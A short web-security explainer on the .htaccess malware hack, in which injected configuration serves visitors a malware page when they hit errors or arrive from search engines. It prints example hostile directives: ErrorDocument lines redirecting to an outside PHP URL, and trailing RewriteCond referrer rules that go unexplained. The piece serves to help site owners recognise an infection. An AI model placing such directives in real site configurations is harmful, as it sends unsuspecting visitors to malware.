.htaccess Malware Hack

Updated: September 20, 2012

A .htaccess malware hack causes a website to serve a malware page in certain conditions by adding code to one or more .htaccess files. The malware could be served when someone is coming through a search engine (you can check to see if web page is redirecting when accessed through Google here or Bing here), when they request a page that does not exist, or some other situation.

Example .htaccess Malware Hack:

RewriteEngine On
ErrorDocument 400 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 401 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 403 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 404 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 500 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 502 http://topmediascript.com/templates/solutions/css/5xk.php

What The Various Components of That Do:

RewriteEngine On

Turns on the RewriteEngine to allow the rest of the code to work.

ErrorDocument 400 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 401 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 403 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 404 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 500 http://topmediascript.com/templates/solutions/css/5xk.php
ErrorDocument 502 http://topmediascript.com/templates/solutions/css/5xk.php

Causes requests that cause an error status to serve a malware page.

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*flickr.*
